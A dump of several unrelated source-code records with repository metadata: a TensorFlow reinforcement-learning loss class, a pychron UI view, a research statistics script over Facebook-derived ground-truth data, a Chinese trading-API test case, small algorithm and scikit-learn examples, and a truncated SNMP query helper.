additional_rewards, _ = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action, with_logging=False)
assert rewards.shape == additional_rewards.shape
rewards += additional_rewards
# tf.math.pow does not work on TPU so we compute it manually.
adjusted_discount_factor = 1.
for _ in range(self._frame_skip):
adjusted_discount_factor *= self._discount_factor
vs, advantages = self._advantage_estimator(
unnormalized_predictions,
rewards, done_terminated,
done_abandoned,
adjusted_discount_factor,
target_action_log_probs,
behaviour_action_log_probs)
if self._reward_normalizer:
normalized_targets = self._reward_normalizer.normalize_target(vs)
normalized_advantages = self._reward_normalizer.normalize_advantage(
advantages)
self._reward_normalizer.update_normalization_statistics(vs)
else:
normalized_targets = vs
normalized_advantages = advantages
outputs = (normalized_targets, normalized_advantages)
if return_learner_outputs:
outputs += (learner_outputs,)
return outputs
def __call__(self, agent_state, prev_actions, env_outputs, agent_outputs,
normalized_targets=None, normalized_advantages=None):
"""Computes the loss."""
if normalized_targets is None:
normalized_targets, normalized_advantages, learner_outputs = \
self.compute_advantages(
agent_state, prev_actions, env_outputs, agent_outputs,
return_learner_outputs=True)
# The last timestep is only used for computing advantages so we
# remove it here.
agent_state, prev_actions, env_outputs, agent_outputs = \
tf.nest.map_structure(
lambda t: t[:-1],
(agent_state, prev_actions, env_outputs, agent_outputs))
else: # Advantages are already precomputed.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_outputs.baseline)
old_corrected_predictions = self._reward_normalizer.correct_prediction(
agent_outputs.baseline)
else:
corrected_predictions = learner_outputs.baseline
old_corrected_predictions = agent_outputs.baseline
# Compute the advantage-based loss.
policy_loss = tf.reduce_mean(
self._policy_loss(
normalized_advantages,
target_action_log_probs,
behaviour_action_log_probs,
actions=agent_outputs.action,
target_logits=learner_outputs.policy_logits,
behaviour_logits=agent_outputs.policy_logits,
parametric_action_distribution=self._parametric_action_distribution)
)
# Value function loss
v_error = normalized_targets - corrected_predictions
self.log('GeneralizedOnPolicyLoss/V_error', v_error)
self.log('GeneralizedOnPolicyLoss/abs_V_error', tf.abs(v_error))
self.log('GeneralizedOnPolicyLoss/corrected_predictions',
corrected_predictions)
# Huber loss reduces the last dimension so we add a dummy one here.
normalized_targets = normalized_targets[..., tf.newaxis]
corrected_predictions = corrected_predictions[..., tf.newaxis]
v_loss = self.v_loss_fn(normalized_targets, corrected_predictions)
# PPO-style value loss clipping
if self._value_ppo_style_clip_eps is not None:
old_corrected_predictions = old_corrected_predictions[..., tf.newaxis]
clipped_corrected_predictions = tf.clip_by_value(
corrected_predictions,
old_corrected_predictions - self._value_ppo_style_clip_eps,
old_corrected_predictions + self._value_ppo_style_clip_eps)
clipped_v_loss = self.v_loss_fn(normalized_targets,
clipped_corrected_predictions)
v_loss = tf.maximum(v_loss, clipped_v_loss)
v_loss = tf.reduce_mean(v_loss)
# Compute the regularization loss.
if self._regularizer:
per_step_regularization, regularization_loss = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action)
if not self._include_regularization_in_returns:
regularization_loss += tf.reduce_mean(per_step_regularization)
else:
regularization_loss = 0.
total_loss = policy_loss + self._baseline_cost*v_loss + regularization_loss
return total_loss
class PolicyLoss(tf.Module, metaclass=abc.ABCMeta):
"""Abstract base class for policy losses."""
@abc.abstractmethod
def __call__(self, advantages, target_action_log_probs,
behaviour_action_log_probs):
r"""Computes policy loss.
Args:
advantages: A float32 tensor of shape [T, B] of advantages.
target_action_log_probs: A float32 tensor of shape [T, B] with
log-probabilities of taking the action by the current policy
behaviour_action_log_probs: A float32 tensor of shape [T, B] with
log-probabilities of taking the action by the behavioural policy
Returns:
A float32 tensor of shape [T, B] with the policy loss.
"""
raise NotImplementedError('`__call__()` is not implemented!')
class RegularizationLoss(tf.Module, metaclass=abc.ABCMeta):
"""Abstract base class for policy losses."""
@abc.abstractmethod
def __call__(self, parametric_action_distribution, target_action_logits,
behaviour_action_logits, actions):
r"""Computes regularization loss.
Args:
parametric_action_distribution: Parametric action distribution.
target_action_logits: A float32 tensor of shape [T, B, A] with
the logits of the target policy.
behaviour_action_logits: A float32 tensor of shape [T, B, A] with
the logits of the behavioural policy.
actions: A float32 tensor of shape [T, B, A] with the actions taken by the
behaviour policy.
Returns:
A float32 tensor of shape [T, B] with the regularization loss.
"""
raise NotImplementedError('`__call__()` is not implemented!')
| [
"[email protected]"
]
| |
9be35d2a711c8eb0700d7ddfc54912967c9d4596 | ff81a9d7880f1b85a1dc19d5eba5ac72d7179c86 | /pychron/options/views/flux_visualization_views.py | 208b66906956dcd975359ab479acc112319b92dd | [
"Apache-2.0"
]
| permissive | UManPychron/pychron | 2fb7e479a9f492423c0f458c70102c499e1062c4 | b84c9fd70072f9cbda30abe2c471e64fe3dd75d8 | refs/heads/develop | 2022-12-03T23:32:45.579326 | 2020-01-29T19:02:20 | 2020-01-29T19:02:20 | 36,100,637 | 0 | 0 | null | 2015-05-23T00:10:06 | 2015-05-23T00:10:05 | null | UTF-8 | Python | false | false | 2,220 | py | # ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from chaco.default_colormaps import color_map_name_dict
from traitsui.api import Item, HGroup, VGroup, EnumEditor
from pychron.options.options import SubOptions, AppearanceSubOptions
class FluxVisualizationSubOptions(SubOptions):
def traits_view(self):
grp = VGroup(Item('plot_kind'),
Item('model_kind'))
return self._make_view(grp)
class FluxVisualizationAppearanceSubOptions(AppearanceSubOptions):
def traits_view(self):
twodgrp = VGroup(HGroup(Item('color_map_name',
label='Color Map',
editor=EnumEditor(values=sorted(color_map_name_dict.keys()))),
Item('levels')),
visible_when='plot_kind=="2D"',
label='Options',
show_border=True)
onedgrp = VGroup(Item('marker_size'),
visible_when='plot_kind=="1D"',
label='Options',
show_border=True)
scalegrp = VGroup(Item('flux_scalar', label='Scale', tooltip='Multiple flux by Scale. FOR DISPLAY ONLY'))
return self._make_view(VGroup(twodgrp, onedgrp, scalegrp))
VIEWS = {'main': FluxVisualizationSubOptions,
'appearance': FluxVisualizationAppearanceSubOptions}
# ============= EOF =============================================
| [
"[email protected]"
]
| |
e28c6068b08233751108e44a68f3829d31617344 | 8229176ba618c08e23e47ca4b0a7c1ebeef4d994 | /src/DescriptiveStats.py | 6430639afb563b8258f98091b749e8a170eef2d0 | []
| no_license | benblamey/ben_phd_python | 703997daef090941b2e679dfee1cff78d475fa5f | 7518784270410e2afdb2adfebf97fa1f4286449f | refs/heads/master | 2021-05-04T11:09:21.582715 | 2017-09-18T20:43:32 | 2017-09-18T20:43:32 | 47,449,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,702 | py | from core import *
# Import Datum Types from CSV file
def do_descriptiveStats():
global total_gt_datums
# See: ExportGroundTruthDatumEventTypes in Java.
# a table of the different kinds of datums was exported to CSV (for all user lifestories)
# { ID : datum-classname }
# all the datums -- not just the ground truth datums.
datum_types = {}
# Two strategies for life story selection:
#- Use the latest life story always - recommended for most things - maximizes Ground truth data which "exists" in the life stories (38 missing vs. 104)
#- Use the life story which matches the gold gate doc -this is the only strategy suitable for gold labelling text eval. */
with open(data_dir + 'DatumTypesForPython.csv', 'r') as csvfile: # LATEST
#- these are slightly older and contain slightly more datums!!!!!!!!!!!!!
spamreader = csv.reader(csvfile, delimiter=',')
for row in spamreader:
datum_types[row[0]] = row[1]
print(set(datum_types.values()))
if (len(set(datum_types.keys())) != total_gt_datums):
print("Number of GT datums defined in core.py = " + str(total_gt_datums))
print("Number of GT datums in DatumTypesForPython.csv = " + str(len(set(datum_types.keys()))))
# raise Exception("gt datum count does not match")
pp = pprint.PrettyPrinter(indent=4)
client = pymongo.MongoClient("localhost", 27017) # previously using 1234 for tunnel.
users = client.SocialWorld.users
print("number of users: " + str(users.count()))
data = []
excluded_datums = 0
for user in users.find():
print(user["FACEBOOK_USER_ID"])
if (user[u"FACEBOOK_USER_ID"] == u"16457018212"):
continue # Unknown randomer
if (user[u"FACEBOOK_USER_ID"] == u"836555706"):
continue # Muhamed Mustafa
if (user[u"FACEBOOK_USER_ID"] == u"100005149806497"):
continue # Felix Smith
if "GROUND_TRUTH_EVENTS" in user:
fullname = user[u"FACEBOOK_FIRST_NAME"] + user[u"FACEBOOK_LAST_NAME"]
print("fullname: " + fullname) #.encode(sys.stdout.encoding, errors = 'replace'))
usergts = user["GROUND_TRUTH_EVENTS"]
data_user = []
for gtec in usergts["events"]:
data_user_datums = []
# lookup the datum IDs in the dictionary
# [3:] #strip off 'fb_' at the start
for datum in gtec["datums"]:
datum_num_id = datum['id']
if (datum_num_id.startswith('fb_')):
datum_num_id = datum_num_id[3:]
# We exclude datums that are missing from the latest life story.
if (datum_num_id in datum_types):
datumtype = datum_types[datum_num_id]
data_user_datums.append((datum_num_id, datumtype))
else:
excluded_datums += 1
if (len(data_user_datums) > 0):
data_user.append(data_user_datums)
if (len(data_user)>0):
data.append(data_user)
table_data = []
table_data.append(("Participants", users.count()))
table_data.append(("...who created ground truth event clusters",len(data)))
table_data.append(("Total ground truth event clusters",
sum(len(user) for user in data)))
table_data.append(("Mean clusters per user",
"{:.2f}".format(
float(sum(len(user) for user in data))/ # no of clusters
users.count()) # no of users
))
total_gt_datums_calc = len(list(chain.from_iterable(chain.from_iterable(data))))
print("total_gt_datums: ")
print(total_gt_datums)
print("total_gt_datums_calc: ")
print(total_gt_datums_calc) # GT datums from MongoDB
assert(total_gt_datums == total_gt_datums_calc)
table_data.append(("Total datums in ground truth clusters", total_gt_datums))
table_data.append(("Mean datums per cluster",
"{:.2f}".format(
float(len(list(chain.from_iterable(chain.from_iterable(data))))) # total datums
/sum(len(user) for user in data) # total clusters
)
))
#print "List of Number of Ground Truth Event Clusters per User"
number_of_gt_events_per_user = list(len(user_events) for user_events in data)
#pp.pprint(number_of_gt_events_per_user)
#print "List of Number of Datums per Ground Truth Event Cluster"
number_of_datums_per_gt_event_cluster = [len(list(gt_cluster)) for gt_cluster in chain.from_iterable(data)]
#pp.pprint(number_of_datums_per_gt_event_cluster)
#table_data.append(("Total ground truth event clusters", total_gtecs))
#table_data.append(("Total ground truth event cluster datums", total_gtecdatums))
print("#### Excluded Datums: " + str(excluded_datums) + "####") # under latest=38,gold_or_latest=?
pp.pprint(table_data)
# Generate Data for Bar Chart
# Frequency of Number of Ground Truth Event Clusters per User
# =========
gteventsizes = number_of_gt_events_per_user
xvalues = range(1,max(gteventsizes)+1)
gt_events_per_user_graph_data = [0] * max(gteventsizes)
print(xvalues)
for (x,f) in Counter(gteventsizes).items():
gt_events_per_user_graph_data[x-1] = f
print(gt_events_per_user_graph_data )
width = 1
xlabels = range(0,max(gteventsizes)+2, 2)
xlabels_positions = [x + 0.5 for x in xlabels]
xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
bar(xvalues, gt_events_per_user_graph_data, width=width, linewidth=1)
yticks(range(0, max(gt_events_per_user_graph_data)+2))
xticks(xlabels_positions, xlabels)
xlabel("# Ground Truth Events for User")
ylabel("Frequency")
xlim(0, max(xlabels)+1)
# The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
gca().get_xaxis().set_minor_locator(xminorformatter)
gca().get_xaxis().tick_bottom()
gca().get_yaxis().tick_left()
savefig(phd_output_dir+"ch5_gen_freqGTusers.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_freqGTusers.pdf", dpi=600, figsize=(8, 6))
#title("Frequency of Number of Ground Truth Event Clusters per User")
# Frequency of Number of Datums per Ground Truth Event Cluster
# ============================================================
gtecsizes = number_of_datums_per_gt_event_cluster
xvalues = range(1,max(gtecsizes)+1)
datums_per_event_cluster_graph_data = [0] * max(gtecsizes)
print(xvalues)
for (x,f) in Counter(gtecsizes).items():
datums_per_event_cluster_graph_data[x-1] = f
print(datums_per_event_cluster_graph_data )
#import numpy
#xlocations = numpy.array(range(len(gteventsizes)))+0.5
#xlocations = xlocations+ width/2 * 2
#print xlocations
width = 1
xlabels = range(0,max(gtecsizes)+2, 2)
xlabels_positions = [x + 0.5 for x in xlabels]
xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
#print xlocations
#import matplotlib.font_manager as font_manager
#prop = font_manager.FontProperties(fname='C:/windows/fonts/cmunrm.ttf')
#mpl.rcParams['font.family'] = prop.get_name()
#font = {'family' : prop.get_name(),
# #'weight' : 'bold',
# #'size' : 10
# }
#rcParams['font.family'] = 'serif'
# font.cursive: [u'Apple Chancery', u'Textile', u'Zapf Chancery', u'Sand', u'cursive']
#font.family: [u'serif']
#font.fantasy: [u'Comic Sans MS', u'Chicago', u'Charcoal', u'ImpactWestern', u'fantasy']
#font.monospace: [u'Bitstream Vera Sans Mono', u'DejaVu Sans Mono', u'Andale Mono', u'Nimbus Mono L', u'Courier New', u'Courier', u'Fixed', u'Terminal', u'monospace']
#font.sans-serif: [u'Bitstream Vera Sans', u'DejaVu Sans', u'Lucida Grande', u'Verdana', u'Geneva', u'Lucid', u'Arial', u'Helvetica', u'Avant Garde', u'sans-serif']
#font.serif: [u'CMU Serif']
#rcParams['font.fantasy'] = prop.get_name()
#rcParams['font.monospace'] = prop.get_name()
#rcParams['font.sans-serif'] = prop.get_name()
#rcParams['font.serif'] = prop.get_name()
#print rcParams
bar(xvalues, datums_per_event_cluster_graph_data, width=width, linewidth=1)
yticks(range(0, max(datums_per_event_cluster_graph_data)+10, 10))
xticks(xlabels_positions, xlabels)
xlim(0, max(xlabels)+1)
xlabel("# Datums in Ground Truth Event Cluster")#, fontdict=font)
ylabel("Frequency")
# The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
gca().get_xaxis().set_minor_locator(xminorformatter)
gca().get_xaxis().tick_bottom()
gca().get_yaxis().tick_left()
savefig(phd_output_dir+"ch5_gen_freqGTevents.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_freqGTevents.pdf", dpi=600, figsize=(8, 6))
#title("Frequency of Number of Datums per Ground Truth Event Cluster")
# Types in GT Event Clusters
# =======
# In[6]:
datum_type_counts = Counter()
for user in data:
for gt_event_cluster in user:
for datum in gt_event_cluster:
datum_type = datum[1]
datum_type_counts[datum_type] += 1
pretty_labels = {
'benblamey.saesneg.model.datums.DatumPhoto': 'Photo',
'benblamey.saesneg.model.datums.DatumStatusMessage': 'Status Message',
'benblamey.saesneg.model.datums.DatumCheckin': 'Check-In',
'benblamey.saesneg.model.datums.DatumEvent': 'Facebook Event',
'mixed': '(Mixed)',
}
#t = sum(x_list)
#cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
# (float(x)/t) * 100) + "\%") # \% is for latex.
# for x in x_list ])
label_list = [pretty_labels[key] for key in datum_type_counts.keys()]
values = datum_type_counts.values()
datum_type_table_data = zip(label_list, values)
#cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
#cluster_type_comp_table_data.reverse()
#print cluster_type_comp_table_data
hr = ['Type','Frequency']
datum_type_table_data.append(("\midrule Total", sum(values)))
t = matrix2latex.matrix2latex(datum_type_table_data,
headerRow = hr,
filename=phd_output_dir+'ch5_table_gen_datums_by_type',
caption='Frequency of Datum by Type',
alignment='r r')
print(t)
# In[7]:
#Number of types in each gt event cluster
types_in_gt_clusters = [set([datum[1] for datum in gt_event_cluster]) for gt_event_cluster in list(chain.from_iterable(data))]
#pp.pprint(types_in_gt_clusters)
gt_cluster_type_counter = Counter()
for types in types_in_gt_clusters:
if (len(types) == 1):
type = next(iter(types))
else:
type = 'mixed'
gt_cluster_type_counter[type] += 1
pp.pprint(gt_cluster_type_counter)
# In[8]:
print(gt_cluster_type_counter.keys())
label_list = [pretty_labels[label] for label in gt_cluster_type_counter.keys()]
x_list = gt_cluster_type_counter.values()
clf()
axis("equal")
pie(
x_list,
labels=label_list,
autopct=None,
#startangle=45
#autopct="%1.1f%%",
#pctdistance=0.8
)
#savefig(phd_output_dir+"ch5_gen_GTtypepie.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_GTtypepie.pdf", dpi=600, figsize=(8, 6))
# In[9]:
t = sum(x_list)
cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
(float(x)/t) * 100) + "\%") # \% is for latex.
for x in x_list ])
cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
#cluster_type_comp_table_data.reverse()
print(cluster_type_comp_table_data)
hr = ['Type(s) in Event Cluster','Frequency','']
cluster_type_comp_table_data.append(("\midrule Total", t, ""))
t = matrix2latex.matrix2latex(cluster_type_comp_table_data,
headerRow = hr,
filename=phd_output_dir+'ch5_table_gen_gt_comp_by_type',
caption='Ground Truth Cluster Datums by Type',
alignment='r r r')
print(t)
# X-Type Matrix
# ====
# Postive/Intra Cases
cross_types_matrix = Counter()
all_types = Set()
for user in data:
for gtec in user:
for x in gtec:
x_id = x[0]
x_type = x[1]
all_types.add(x_type)
for y in gtec:
y_id = y[0]
y_type = y[1]
if (x_type > y_type):
continue
if (x_id == y_id):
continue
types = [x_type,y_type]
types.sort()
types = tuple(types)
cross_types_matrix[types] += 1
pp.pprint (cross_types_matrix)
print((all_types))
# Negative/Inter Cases
inter_cross_types_matrix = Counter()
for user in data:
for cluster_x in user:
for cluster_y in user:
if (cluster_x == cluster_y): # this works.
continue
for x_datum in cluster_x:
x_type = x_datum[1]
for y_datum in cluster_y:
y_type = y_datum[1]
if (x_type > y_type):
continue
types = [x_type,y_type]
types.sort()
types = tuple(types)
inter_cross_types_matrix[types] += 1
# In[12]:
all_types_sorted = list(all_types)
all_types_sorted.sort()
all_types_sorted_reversed = list(all_types_sorted)
all_types_sorted_reversed.reverse()
pair_table_data = []
header_row = list(all_types_sorted)
header_row = [pretty_labels[typestring] for typestring in header_row]
header_row.insert(0,"")
xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
xtype_table_data.append(table_row)
matrix2latex.matrix2latex(xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_intra_xtype_cluster",
caption="Intra-Cluster Datum Pairs by Type (Positive Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("Total intra-cluster (positive) datum pairs",
sum(count for count in cross_types_matrix.values())))
inter_xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = inter_cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
inter_xtype_table_data.append(table_row)
matrix2latex.matrix2latex(inter_xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_inter_xtype_cluster",
caption="Inter-Cluster Datum Pairs by Type (Negative Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("Total inter-cluster (negative) datum pairs",
sum(count for count in inter_cross_types_matrix.values())))
inter_xtype_table_data = [header_row]
for t1 in all_types_sorted:
table_row = [pretty_labels[t1]]
for t2 in all_types_sorted:
if (t1 <= t2):
cell = inter_cross_types_matrix[(t1, t2)] + cross_types_matrix[(t1, t2)]
else:
cell = "-"
table_row.append(cell)
inter_xtype_table_data.append(table_row)
matrix2latex.matrix2latex(inter_xtype_table_data,
filename=phd_output_dir+"ch7_table_gen_all_xtype_cluster",
caption="Cluster Datum Pairs by Type (All Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("\midrule Total cluster datum pairs",
sum(count for count in inter_cross_types_matrix.values())
+ sum(count for count in cross_types_matrix.values())))
# Generate Overview Stats Table
# ====
# In[13]:
t = matrix2latex.matrix2latex(table_data, filename=phd_output_dir+"ch5_table_gen_gt_summary", caption="Summary of participants' ground truth data.", alignment='r r')
print(t)
# In[14]:
t = matrix2latex.matrix2latex(pair_table_data,
filename=phd_output_dir+'ch7_table_pair_summary',
caption='Summary of Ground Truth Datum Pairs.',
alignment='r r')
print(t)
| [
"[email protected]"
]
| |
caa434acc7d304b0c285e9a771010088d560dbc5 | d3efc82dfa61fb82e47c82d52c838b38b076084c | /Autocase_Result/ReverseRepo/YW_NHG_SHHG_019_GC003.py | 9f23f2cae281cc74a7cff9d8df2f7abdba2b90e2 | []
| no_license | nantongzyg/xtp_test | 58ce9f328f62a3ea5904e6ed907a169ef2df9258 | ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f | refs/heads/master | 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,025 | py | #!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_NHG_SHHG_019_GC003(xtp_test_case):
# YW_NHG_SHHG_019_GC003
def test_YW_NHG_SHHG_019_GC003(self):
title = '上海逆回购--数量(等于100万张)-3天'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': '',
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('204003', '1', '12', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_REPO'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['随机中间价'],
'quantity': 1000000,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
8a2eb7cfab390a2f709d7eb3419c08fa0e6dd095 | 0eb599c3bbfa6e5b31516913b88cc9db3a1311ce | /ABC_6q/abc169f.py | ad9eed03c6ee61e3f204ed1ab80452f68d22e136 | []
| no_license | Linus-MK/AtCoder | 5b84dc88c2d2773d0f97ed18265d303290da7879 | a587e89a9e0c2ab4d36b09176bcc95e901e14326 | refs/heads/master | 2022-11-25T05:37:12.148722 | 2022-11-17T16:04:10 | 2022-11-17T16:04:10 | 169,840,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | n, s = list(map(int, input().split()))
nums = list(map(int, input().split()))
dp = [[0 for i in range(s+1)] for j in range(n+1)]
mod = 998244353
dp[0][0] = 1
for i in range(n):
for summ in range(s+1):
if summ - nums[i] >= 0:
dp[i+1][summ] = (2 * dp[i][summ] + dp[i][summ - nums[i]]) % mod
else:
dp[i+1][summ] = (2 * dp[i][summ]) % mod
# print(dp)
print(dp[n][s] % mod) | [
"[email protected]"
]
| |
a13a4d56104bd687f7c9c1b4efa6c7b4fb4ee4e4 | 2020c9c6958d9cc338b72f62e24d9ad30c1a8cad | /python/0101.symmetric-tree/symmetric-tree.py | 8cf51e4680551dbd6d293ddb24a39ee7fa4c43f7 | []
| no_license | ysmintor/leetcode | b2d87db932b77e72504ffa07d7bf1b0d8c09b661 | 434889037fe3e405a8cbc71cd822eb1bda9aa606 | refs/heads/master | 2020-05-30T21:03:03.886279 | 2019-10-31T08:46:23 | 2019-10-31T09:02:24 | 189,963,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | class Solution:
"""
recursive solution
"""
def isSymmetric(self, root: TreeNode) -> bool:
if root == None:
return True
return self.isMirror(root.left, root.right)
def isMirror(self, t1: TreeNode, t2:TreeNode ) -> bool:
if t1 == None and t2 == None:
return True
if t1 == None or t2 == None:
return False
return (t1.val == t2.val) \
and self.isMirror(t1.right, t2.left) \
and self.isMirror(t1.left, t2.right)
| [
"[email protected]"
]
| |
30dea1db000cc40ea6b735e332cf15c6d2f4bace | 6413fe58b04ac2a7efe1e56050ad42d0e688adc6 | /tempenv/lib/python3.7/site-packages/plotly/graph_objs/layout/ternary/aaxis/__init__.py | 797a36fb417fb76496384beb1c5bdf6c09acee6b | [
"MIT"
]
| permissive | tytechortz/Denver_temperature | 7f91e0ac649f9584147d59193568f6ec7efe3a77 | 9d9ea31cd7ec003e8431dcbb10a3320be272996d | refs/heads/master | 2022-12-09T06:22:14.963463 | 2019-10-09T16:30:52 | 2019-10-09T16:30:52 | 170,581,559 | 1 | 0 | MIT | 2022-06-21T23:04:21 | 2019-02-13T21:22:53 | Python | UTF-8 | Python | false | false | 159 | py | from ._title import Title
from plotly.graph_objs.layout.ternary.aaxis import title
from ._tickformatstop import Tickformatstop
from ._tickfont import Tickfont
| [
"[email protected]"
]
| |
f86011e920527fade4c0b894ea3f406f6ca86766 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /10_Imbalanced_Classification_with_Python/13/03_balanced_decision_tree.py | 723ce924b4ed4330ac7a194e25defea465a60bfa | []
| no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | # decision tree with class weight on an imbalanced classification dataset
from numpy import mean
from sklearn.datasets import make_classification
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeClassifier
# generate dataset
X, y = make_classification(n_samples=10000, n_features=2, n_redundant=0, n_clusters_per_class=1, weights=[0.99],
flip_y=0, random_state=3)
# define model
model = DecisionTreeClassifier(class_weight='balanced')
# define evaluation procedure
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
# evaluate model
scores = cross_val_score(model, X, y, scoring='roc_auc', cv=cv, n_jobs=-1)
# summarize performance
print('Mean ROC AUC: %.3f' % mean(scores))
| [
"[email protected]"
]
| |
11b41900468b82ef7940e02e889324872ea46a3f | f44a1cbb48952ce466310859234f73cb2769ef2c | /backend/mobile_5_oct_1723/wsgi.py | b09e1b28f4e63a9fbc6f3a96c61672bb2582051a | []
| no_license | crowdbotics-apps/mobile-5-oct-1723 | ea496e71e634a67dccfb39019dd50d9351247943 | 94ddd875afaa86d5810d24644a35e23db6b231d1 | refs/heads/master | 2022-12-25T10:00:21.575101 | 2020-10-05T05:14:39 | 2020-10-05T05:14:39 | 301,300,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for mobile_5_oct_1723 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_5_oct_1723.settings')
application = get_wsgi_application()
| [
"[email protected]"
]
| |
3b43b227b7faa549f674979711bdaec0a30fe8d9 | aaf7e8f9ec5856241930c98167071e424967b486 | /src/lib/glfs-web/app/snmp.py | f9fa73d88593c3e76f64161535626ffe193a8b58 | []
| no_license | ShenDezhou/PyCRM | e32826d143598227910c6a13bbc70140ec7f56d2 | 36b9411d9d5372b59fed00afdbc74607fb010df9 | refs/heads/master | 2022-02-10T02:29:45.876818 | 2018-06-17T10:09:43 | 2018-06-17T10:09:43 | 72,261,079 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | import netsnmp
def snmp_query(oid, dest_host, community,version=2):
varbind = netsnmp.Varbind(oid)
result = netsnmp.snmpwalk(varbind, Version=version,
